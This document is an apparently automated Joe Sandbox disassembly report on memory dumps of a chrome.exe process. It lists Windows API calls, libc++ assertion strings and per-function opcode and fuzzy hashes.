                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: __floor_pentium4
                                                    • String ID: %s (errno: %d, %s)$..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at$..\..\third_party\perfetto\include\perfetto\tracing\track_event_interned_data_index.h$PERFETTO_CHECK(false)
                                                    • API String ID: 4168288129-2023842766
                                                    • Opcode ID: fd071288b683b0b4513122af4b738323fa5ad921985d3be9ef5eb3a258872ba2
                                                    • Instruction ID: 2910586de33e9787c55d0515e94ddfff0f8b83cc33fc1aa4a9395d3fa1791563
                                                    • Opcode Fuzzy Hash: fd071288b683b0b4513122af4b738323fa5ad921985d3be9ef5eb3a258872ba2
                                                    • Instruction Fuzzy Hash: DC728B71A046198FDB25CF64C8807EDB7B2BF49310F19856ADA0ABB350DB30AD85CF61
                                                    APIs
                                                    • TryAcquireSRWLockExclusive.KERNEL32(?), ref: 00DF1F8D
                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 00DF20A6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ExclusiveLock$AcquireRelease
                                                    • String ID: T$T
                                                    • API String ID: 17069307-3594344597
                                                    • Opcode ID: c02cb90f901a8068c138e96d174a09709c685ac2422a37076b8706d3bd401d8e
                                                    • Instruction ID: 03a099936fff2ccaed36737a70a15eb723ef2b778214d1b64c5facffc142e3bf
                                                    • Opcode Fuzzy Hash: c02cb90f901a8068c138e96d174a09709c685ac2422a37076b8706d3bd401d8e
                                                    • Instruction Fuzzy Hash: D6F1C776E002098BDB14CF64D88067DB7B6BF85310F6AC229EA15AB351DB71EC45CBA0
                                                    APIs
                                                    • GetCurrentThreadId.KERNEL32 ref: 00DF6354
                                                    • GetCurrentThreadId.KERNEL32 ref: 00DF6365
                                                    • GetCurrentThreadId.KERNEL32 ref: 00DF6376
                                                    • GetCurrentThreadId.KERNEL32 ref: 00DF6387
                                                    • GetCurrentThreadId.KERNEL32 ref: 00DF63B1
                                                    • GetCurrentThreadId.KERNEL32 ref: 00DF63C2
                                                    • GetCurrentThreadId.KERNEL32 ref: 00DF63D3
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: CurrentThread
                                                    • String ID:
                                                    • API String ID: 2882836952-0
                                                    • Opcode ID: 0c14b4d5ba52c18f69ec4676d165ca03ebc9d5c61bb95306ed2ac1850c8daa2b
                                                    • Instruction ID: 7d0d89b7781409fc912e86327a62db11c1868277795acf84696d8c7a05acfa8a
                                                    • Opcode Fuzzy Hash: 0c14b4d5ba52c18f69ec4676d165ca03ebc9d5c61bb95306ed2ac1850c8daa2b
                                                    • Instruction Fuzzy Hash: ABE1D2719007848FD320CF388454766BBE1BF95314F1ECA6DD5AA8B762EB30E885CB61
                                                    APIs
                                                    Strings
                                                    • ", xrefs: 00DF8617
                                                    • ..\..\third_party\libc++\src\include\string:973: assertion __s != nullptr failed: basic_string(const char*) detected nullptr, xrefs: 00DF8E5E
                                                    • ..\..\third_party\libc++\src\include\__string\char_traits.h:145: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap, xrefs: 00DF8E65
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Similarity
                                                    • API ID: _strlen
                                                    • String ID: "$..\..\third_party\libc++\src\include\__string\char_traits.h:145: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap$..\..\third_party\libc++\src\include\string:973: assertion __s != nullptr failed: basic_string(const char*) detected nullptr
                                                    • API String ID: 4218353326-3931686229
                                                    • Opcode ID: 799eb22f5fd9ac103d4e0c7efa8f401e776b7765a5afe0d6749d07e1ec758719
                                                    • Instruction ID: 396cd8fc06a8298a149993980a175fb0a32b4b52a7c0523165ff33c149a391ef
                                                    • Opcode Fuzzy Hash: 799eb22f5fd9ac103d4e0c7efa8f401e776b7765a5afe0d6749d07e1ec758719
                                                    • Instruction Fuzzy Hash: 1B624971E002189FCB14CF69D4809ADFBF6BF88314B29C569E959AB351DB31AC05CFA1
                                                    APIs
                                                    • GetCurrentThreadId.KERNEL32 ref: 00DCAC98
                                                    Strings
                                                    • ..\..\third_party\libc++\src\include\vector:1411: assertion __n < size() failed: vector[] index out of bounds, xrefs: 00DCA955, 00DCAA01, 00DCACA9
                                                    • ..\..\third_party\libc++\src\include\vector:1557: assertion __first <= __last failed: vector::erase(first, last) called with invalid range, xrefs: 00DCACEF
                                                    • ..\..\third_party\libc++\src\include\__memory\construct_at.h:66: assertion __loc != nullptr failed: null pointer given to destroy_at, xrefs: 00DCA973, 00DCACFE
                                                    • ..\..\third_party\libc++\src\include\vector:1539: assertion !empty() failed: vector::pop_back called on an empty vector, xrefs: 00DCA964
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Similarity
                                                    • API ID: CurrentThread
                                                    • String ID: ..\..\third_party\libc++\src\include\__memory\construct_at.h:66: assertion __loc != nullptr failed: null pointer given to destroy_at$..\..\third_party\libc++\src\include\vector:1411: assertion __n < size() failed: vector[] index out of bounds$..\..\third_party\libc++\src\include\vector:1539: assertion !empty() failed: vector::pop_back called on an empty vector$..\..\third_party\libc++\src\include\vector:1557: assertion __first <= __last failed: vector::erase(first, last) called with invalid range
                                                    • API String ID: 2882836952-3981179074
                                                    • Opcode ID: b9e08c780bc65cf1f59bca8cd2dcc3c5d1b26ed1c1e5b571b4c668179484c938
                                                    • Instruction ID: 000a0764429b3afd20f489a8165b918be1821bbdfc45bf5bb53510b2ecf7f89c
                                                    • Opcode Fuzzy Hash: b9e08c780bc65cf1f59bca8cd2dcc3c5d1b26ed1c1e5b571b4c668179484c938
                                                    • Instruction Fuzzy Hash: AFD16375B0020A9FCB24CF6CD581B6AB7E2FB88314B29852DD556A7345DB31AC41CBA2
                                                    APIs
                                                    Strings
                                                    • GenuineIntel, xrefs: 00D68259
                                                    • ..\..\third_party\libc++\src\include\string_view:320: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 00D6840B
                                                    • ..\..\third_party\libc++\src\include\__string\char_traits.h:145: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap, xrefs: 00D683FD
                                                    • ..\..\third_party\libc++\src\include\string_view:318: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 00D68404
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Similarity
                                                    • API ID: _strlen
                                                    • String ID: ..\..\third_party\libc++\src\include\__string\char_traits.h:145: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap$..\..\third_party\libc++\src\include\string_view:318: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:320: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr$GenuineIntel
                                                    • API String ID: 4218353326-3642438641
                                                    • Opcode ID: 01b60db5fb40311808e0b088ba4085bfae71cc2948da16db911b31009bdee15e
                                                    • Instruction ID: faa31ce01544165869ee4a199aa7deb1b32b513041e9996684aa6156c1ccc015
                                                    • Opcode Fuzzy Hash: 01b60db5fb40311808e0b088ba4085bfae71cc2948da16db911b31009bdee15e
                                                    • Instruction Fuzzy Hash: 82B1E4B1E047458FDB18CF69C4813AEBBF1EB28304F144A2ED886E7742DA75E905DB64
                                                    Strings
                                                    • ..\..\third_party\libc++\src\include\vector:1411: assertion __n < size() failed: vector[] index out of bounds, xrefs: 00DF2C61
                                                    • 1U!S, xrefs: 00DF28EA
                                                    • ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at, xrefs: 00DF2C70
                                                    • ..\..\third_party\libc++\src\include\vector:1418: assertion __n < size() failed: vector[] index out of bounds, xrefs: 00DF2C91
                                                    • ..\..\third_party\libc++\src\include\__memory\construct_at.h:66: assertion __loc != nullptr failed: null pointer given to destroy_at, xrefs: 00DF2CA0
                                                    • 1U!S, xrefs: 00DF287A
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Similarity
                                                    • API ID: _strlen
                                                    • String ID: ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at$..\..\third_party\libc++\src\include\__memory\construct_at.h:66: assertion __loc != nullptr failed: null pointer given to destroy_at$..\..\third_party\libc++\src\include\vector:1411: assertion __n < size() failed: vector[] index out of bounds$..\..\third_party\libc++\src\include\vector:1418: assertion __n < size() failed: vector[] index out of bounds$1U!S$1U!S
                                                    • API String ID: 4218353326-3107453488
                                                    • Opcode ID: 656da3e54df6a2fa817baadd45edfc4b64ba67cb961cab9d94067d84fb1e008e
                                                    • Instruction ID: 07a3c7b5c0db9229d0aafd591d06be99438d37af72169fbd1087d5a435e9173a
                                                    • Opcode Fuzzy Hash: 656da3e54df6a2fa817baadd45edfc4b64ba67cb961cab9d94067d84fb1e008e
                                                    • Instruction Fuzzy Hash: F1328071E002199FDB14CF98D881ABEB7B2FF84314F1AC159E946AB345D730AD46CBA1
                                                    APIs
                                                    Strings
                                                    • ), xrefs: 00DF77CA
                                                    • ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at, xrefs: 00DF77DE
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Similarity
                                                    • API ID: __floor_pentium4
                                                    • String ID: ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at$)
                                                    • API String ID: 4168288129-3378228832
                                                    • Opcode ID: 23ca503fe81f52cc745e79df135834455fac5ca5c035510875208ae354a52579
                                                    • Instruction ID: 83436c95b4bfe9a35c8434b80beae9cf110332987c657ee752460801f026f46d
                                                    • Opcode Fuzzy Hash: 23ca503fe81f52cc745e79df135834455fac5ca5c035510875208ae354a52579
                                                    • Instruction Fuzzy Hash: 86D17170A186098FCB19DF69C4915BEB7F2FF99310B29C62DD546EB344D730A8818B61
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3f01260ebf20ca4b73e21e52b5d13809ae3c27eb3958df16668cd88b0e5e7c6e
                                                    • Instruction ID: 0408bdef31d7b72dd63743d8c1989a9b40250e937b8a3d13047a72d44fa1fa4c
                                                    • Opcode Fuzzy Hash: 3f01260ebf20ca4b73e21e52b5d13809ae3c27eb3958df16668cd88b0e5e7c6e
                                                    • Instruction Fuzzy Hash: 33023A71E012199BDF14CFA9D8846AEBBF1FF49314F2492AED519B7340D731AA41CB90
                                                    Strings
                                                    • ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at, xrefs: 00D55F86
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at
                                                    • API String ID: 0-2888085009
                                                    • Opcode ID: 308355cf7cd43721667df03c97558bbb51f969ecea55989d4621ff7585ed65c8
                                                    • Instruction ID: 99e0ea3b4b607a392fde0aab017ee745e52ffc6409dad1eacc32f8238821f89a
                                                    • Opcode Fuzzy Hash: 308355cf7cd43721667df03c97558bbb51f969ecea55989d4621ff7585ed65c8
                                                    • Instruction Fuzzy Hash: 5922D271A01A05CFCB19CF28E490A29F7F2FF99310B298669EC859B355D730EC45CB51
                                                    APIs
                                                    Strings
                                                    • ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at, xrefs: 00DC52E7
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Similarity
                                                    • API ID: __floor_pentium4
                                                    • String ID: ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at
                                                    • API String ID: 4168288129-2888085009
                                                    • Opcode ID: a68b7d3db551e8e4893b4c2c61780b7eb9296f44b7aef4bb67383440c61389c2
                                                    • Instruction ID: 97c40ce951f4521dcbf5de03b6178366b53d6b13ad55f05af2d9db08f31d77e7
                                                    • Opcode Fuzzy Hash: a68b7d3db551e8e4893b4c2c61780b7eb9296f44b7aef4bb67383440c61389c2
                                                    • Instruction Fuzzy Hash: D612D371B04A068FCB18CF69D491B6DF7F2AF99350B29822DD446EB355E731E881CB60
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Similarity
                                                    • API ID: _strlen
                                                    • String ID: 0$0
                                                    • API String ID: 4218353326-203156872
                                                    • Opcode ID: 5ebb2ce745611ea88c19c8ef743140bc578f49ae6c3b459b63b41b89a7727b00
                                                    • Instruction ID: 802a9fa945d44deb0a350f93a55cbfc9bf4b32a78d601107816e9037f3940f2d
                                                    • Opcode Fuzzy Hash: 5ebb2ce745611ea88c19c8ef743140bc578f49ae6c3b459b63b41b89a7727b00
                                                    • Instruction Fuzzy Hash: 5912E175908745CFC720CF29C480A56F7E1FF98308F249A5DE8999B3A1E771E985CB82
                                                    Strings
                                                    • true, xrefs: 00D65DB3
                                                    • ..\..\third_party\libc++\src\include\__string\char_traits.h:145: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap, xrefs: 00D65E22
                                                    • null, xrefs: 00D65DFF
                                                    • false, xrefs: 00D65DB8, 00D65DC8
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Similarity
                                                    • API ID: ___std_exception_destroy
                                                    • String ID: ..\..\third_party\libc++\src\include\__string\char_traits.h:145: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap$false$null$true
                                                    • API String ID: 4194217158-3559124831
                                                    • Opcode ID: 54a33560e7136ce1736eb64e488d384354bd320a96887fbba7647adcbe46ea15
                                                    • Instruction ID: 13db0f8f3cc0f80d74952a0376dd338b304444111d6d011af1ea753ba8aa0bbe
                                                    • Opcode Fuzzy Hash: 54a33560e7136ce1736eb64e488d384354bd320a96887fbba7647adcbe46ea15
                                                    • Instruction Fuzzy Hash: BC515B70B006058FDB00DF28E846AAE7BE1EF55304F188429F586AF3D6D631E945C7B1
                                                    APIs
                                                    • GetCurrentThreadId.KERNEL32 ref: 00D53415
                                                    • TryAcquireSRWLockExclusive.KERNEL32 ref: 00D5341E
                                                    • ReleaseSRWLockExclusive.KERNEL32(?,?), ref: 00D535C9
                                                    Similarity
                                                    • API ID: ExclusiveLock$AcquireCurrentReleaseThread
                                                    • String ID:
                                                    • API String ID: 135963836-0
                                                    • Opcode ID: 8d14876a52eb2d24310349c2c56f8f755e1db5fbd84abc1a6af231886b1cf4c8
                                                    • Instruction ID: 4a0d89c7013bbadff6dd0f4904811194c67eb519560f1de24da89fe922824e16
                                                    • Opcode Fuzzy Hash: 8d14876a52eb2d24310349c2c56f8f755e1db5fbd84abc1a6af231886b1cf4c8
                                                    • Instruction Fuzzy Hash: C9819B71B002149BCF19CF59E88096DB7F2BB94391B2C8569EC06DB351EB30EE49CB60
                                                    APIs
                                                    • GetVersionExW.KERNEL32(?), ref: 00DF3B9D
                                                    • GetProductInfo.KERNEL32(?,?,00000000,00000000,?), ref: 00DF3BB4
                                                      • Part of subcall function 00E282C8: AcquireSRWLockExclusive.KERNEL32(00EF2800,000000C0,?,?,00DBFE69,00F02A10), ref: 00E282D3
                                                      • Part of subcall function 00E282C8: ReleaseSRWLockExclusive.KERNEL32(00EF2800,?,00DBFE69,00F02A10), ref: 00E2830D
                                                    • GetNativeSystemInfo.KERNEL32(00EF440C), ref: 00DF3C41
                                                    Similarity
                                                    • API ID: ExclusiveInfoLock$AcquireNativeProductReleaseSystemVersion
                                                    • String ID:
                                                    • API String ID: 1555125601-0
                                                    • Opcode ID: 24483120eb4c6628f249f38494503af97e4edd742ccdcf87415cc9407f8dc448
                                                    • Instruction ID: ba1490c974882d5e0cf54163180851d6128f1dff66a773ebdb962d6156724f65
                                                    • Opcode Fuzzy Hash: 24483120eb4c6628f249f38494503af97e4edd742ccdcf87415cc9407f8dc448
                                                    • Instruction Fuzzy Hash: 4E3103B19002189FC710DB1AFC86AB777A0FBC9B14F0A8225F61937291D7306D19CB92
                                                    APIs
                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00E4502E
                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00E45038
                                                    • UnhandledExceptionFilter.KERNEL32(-000002A3,?,?,?,?,?,?), ref: 00E45045
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                    • String ID:
                                                    • API String ID: 3906539128-0
                                                    • Opcode ID: afc1f13ed4e05f045e92ea5d3f9d0993dba0634af5ae8fad4b240a0bf6274e4e
                                                    • Instruction ID: 67a2226c6fe57ca6dca18abaeb0eaa19e4a3069f348df750d019ea9b3ec1ce28
                                                    • Opcode Fuzzy Hash: afc1f13ed4e05f045e92ea5d3f9d0993dba0634af5ae8fad4b240a0bf6274e4e
                                                    • Instruction Fuzzy Hash: 5331C47590122D9BCB21DF28E88978DBBF8BF48310F5451EAE41CA7261EB709F858F45
                                                    Strings
                                                    • ..\..\third_party\libc++\src\include\string_view:320: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 00E00D9F
                                                    • ..\..\third_party\libc++\src\include\__string\char_traits.h:145: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap, xrefs: 00E00E74
                                                    • ..\..\third_party\libc++\src\include\string_view:318: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 00E00D90
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ..\..\third_party\libc++\src\include\__string\char_traits.h:145: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap$..\..\third_party\libc++\src\include\string_view:318: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:320: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr
                                                    • API String ID: 0-3267226576
                                                    • Opcode ID: bbd3336143432fc0da86ac6cc97431f5c7a854adb6517fadf78d12e87c7b3150
                                                    • Instruction ID: ef2aaafa5cdc9b1fa63d08d72f26e75301f3543073e229839471a8a95c31db7f
                                                    • Opcode Fuzzy Hash: bbd3336143432fc0da86ac6cc97431f5c7a854adb6517fadf78d12e87c7b3150
                                                    • Instruction Fuzzy Hash: 1712E571A042568FDB14CF58C8917AEBBB2FF85304F299669D8557B3C2C730A982CBD1
                                                    Strings
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 2$ 2$X
                                                    • API String ID: 0-2071702916
                                                    • Opcode ID: 933aed46ee64780b6e0d4b36bddcf660c93df6502c0ffad13da26c41074426fa
                                                    • Instruction ID: 785988b923c9deae6e43b5c279b8d4176841727f1f9b2ae4fa5e32da206a2a16
                                                    • Opcode Fuzzy Hash: 933aed46ee64780b6e0d4b36bddcf660c93df6502c0ffad13da26c41074426fa
                                                    • Instruction Fuzzy Hash: 51023875608305DFCB18CF28C48096ABBE5FF88314F18896DF8999B391D731E985CB92
                                                    APIs
                                                    Strings
                                                    • ..\..\third_party\libc++\src\include\string_view:268: assertion __s != nullptr failed: null pointer passed to non-null argument of char_traits<...>::length, xrefs: 00DF3237
                                                    Similarity
                                                    • API ID: _strlen
                                                    • String ID: ..\..\third_party\libc++\src\include\string_view:268: assertion __s != nullptr failed: null pointer passed to non-null argument of char_traits<...>::length
                                                    • API String ID: 4218353326-3542035028
                                                    • Opcode ID: 7b6e20f9c79bb59a2fa9ba6922a8caa6e39c597e8a1b05e97faa9f5096fa69a7
                                                    • Instruction ID: 0088e8af026f7e655b8f2d4dc82dcb85612ef18a6035a0e62cab85812bb7cced
                                                    • Opcode Fuzzy Hash: 7b6e20f9c79bb59a2fa9ba6922a8caa6e39c597e8a1b05e97faa9f5096fa69a7
                                                    • Instruction Fuzzy Hash: 23F1C070A006098FDB14CF68D895A79BBF0FF49304F1A865DE94A9F352E730E951CBA1
                                                    APIs
                                                    Strings
                                                    • ..\..\third_party\libc++\src\include\string_view:268: assertion __s != nullptr failed: null pointer passed to non-null argument of char_traits<...>::length, xrefs: 00DB5C31
                                                    Similarity
                                                    • API ID: _strlen
                                                    • String ID: ..\..\third_party\libc++\src\include\string_view:268: assertion __s != nullptr failed: null pointer passed to non-null argument of char_traits<...>::length
                                                    • API String ID: 4218353326-3542035028
                                                    • Opcode ID: 3fb14a13e1d3960a9bf24b92dd5c356958ccffbb2f77fc90fad2f3c81c2d22f5
                                                    • Instruction ID: dda1f5ad9b8214b1897f176438a541990f3bd5668ac4e7bbe3472780c7cb0cf6
                                                    • Opcode Fuzzy Hash: 3fb14a13e1d3960a9bf24b92dd5c356958ccffbb2f77fc90fad2f3c81c2d22f5
                                                    • Instruction Fuzzy Hash: A8F1B370A00B05CFDB14CF18E895BA9BBE1FF49304F19465DE84AAB356E770E851CBA1
                                                    APIs
                                                    • InitOnceExecuteOnce.KERNEL32(00F00488,00D9A780,00000000,00000000,00000000,73617720,73617720,?,?,00D4AF4E,00000000,00000000,00000000), ref: 00E072F2
                                                    Strings
                                                    • ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at, xrefs: 00E07530
                                                    Similarity
                                                    • API ID: Once$ExecuteInit
                                                    • String ID: ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at
                                                    • API String ID: 689400697-2888085009
                                                    • Opcode ID: 3f827e566a7c4d08a4bcd4d995ef1515bf2f94326d9498dc2120f3f2eebfe6ab
                                                    • Instruction ID: ebf9a66c5288aceec33dc379b20ea5dd3bc6c9a34d7c5aea875202777924f61e
                                                    • Opcode Fuzzy Hash: 3f827e566a7c4d08a4bcd4d995ef1515bf2f94326d9498dc2120f3f2eebfe6ab
                                                    • Instruction Fuzzy Hash: 3CD14A32E0C4A107DB3D463D8CA02B97AD24FC621570EC37AFCD9EABC7E52C99515694
                                                    APIs
                                                    Strings
                                                    • ..\..\third_party\libc++\src\include\string_view:268: assertion __s != nullptr failed: null pointer passed to non-null argument of char_traits<...>::length, xrefs: 00D54632
                                                    Similarity
                                                    • API ID: _strlen
                                                    • String ID: ..\..\third_party\libc++\src\include\string_view:268: assertion __s != nullptr failed: null pointer passed to non-null argument of char_traits<...>::length
                                                    • API String ID: 4218353326-3542035028
                                                    • Opcode ID: a58568d62b5f8b39b0fbe577fc0ab65c0d38e8da0b4e827efcf38ac721dc88f1
                                                    • Instruction ID: a046ba972d12fe85ebd9a4636027831e697145f3c828020a2f78b5e71ac19ab2
                                                    • Opcode Fuzzy Hash: a58568d62b5f8b39b0fbe577fc0ab65c0d38e8da0b4e827efcf38ac721dc88f1
                                                    • Instruction Fuzzy Hash: 024194B1D003095FD704DF29A84196BB7F5EF99314B14963EF409EB342E770A9448BA1
                                                    APIs
                                                    • InitOnceExecuteOnce.KERNEL32(00F00488,00D9A780,00000000,00000000,?,00D4B992,?,?,?), ref: 00E0942D
                                                    Similarity
                                                    • API ID: Once$ExecuteInit
                                                    • String ID:
                                                    • API String ID: 689400697-0
                                                    • Opcode ID: 141e09c5882769e9f50f7317dd9220c63d79c070d4d7b65c9545ed90ad797dd7
                                                    • Instruction ID: 37359e19155ba7a458674177ac45e911751808c0887313fe3a3ac1d3dd2146f0
                                                    • Opcode Fuzzy Hash: 141e09c5882769e9f50f7317dd9220c63d79c070d4d7b65c9545ed90ad797dd7
                                                    • Instruction Fuzzy Hash: 4DF15271B110568FDF08CF6AECA067EB7A3EBC9300F5A812AD506A7395DB34A915CB50
                                                    Strings
                                                    • ..\..\third_party\libc++\src\include\string_view:320: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 00DC5AE8
                                                    • ..\..\third_party\libc++\src\include\string_view:318: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 00DC5AE1
                                                    Similarity
                                                    • API ID: _strlen
                                                    • String ID: ..\..\third_party\libc++\src\include\string_view:318: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:320: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr
                                                    • API String ID: 4218353326-2500828650
                                                    • Opcode ID: 054285c17f8c9ccdc12217f714dd8673615695e32434ec368c0906a546e1bbd2
                                                    • Instruction ID: 97d6b121bb49671f3b0bc2df170debd56b70132aa079ac6a0e4a2ba692f2ede2
                                                    • Opcode Fuzzy Hash: 054285c17f8c9ccdc12217f714dd8673615695e32434ec368c0906a546e1bbd2
                                                    • Instruction Fuzzy Hash: FF12B571A006568FDB04CF54D880B6A7BB2BF84314F29865DD8569B399D731FD82CBA0
                                                    Strings
                                                    • ..\..\third_party\libc++\src\include\vector:1411: assertion __n < size() failed: vector[] index out of bounds, xrefs: 00DB92B3
                                                    • ..\..\third_party\libc++\src\include\optional:800: assertion this->has_value() failed: optional operator* called on a disengaged value, xrefs: 00DB92C2
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ..\..\third_party\libc++\src\include\optional:800: assertion this->has_value() failed: optional operator* called on a disengaged value$..\..\third_party\libc++\src\include\vector:1411: assertion __n < size() failed: vector[] index out of bounds
                                                    • API String ID: 0-1100549160
                                                    • Opcode ID: 5150fc1f74bd4c2be76e7910fcb260675c69cbcc93d8f557b64ad8be57939aae
                                                    • Instruction ID: fb8f35bee7bd3db98e36137c20708cbe2fdc6508323fac079786e7961fdcef65
                                                    • Opcode Fuzzy Hash: 5150fc1f74bd4c2be76e7910fcb260675c69cbcc93d8f557b64ad8be57939aae
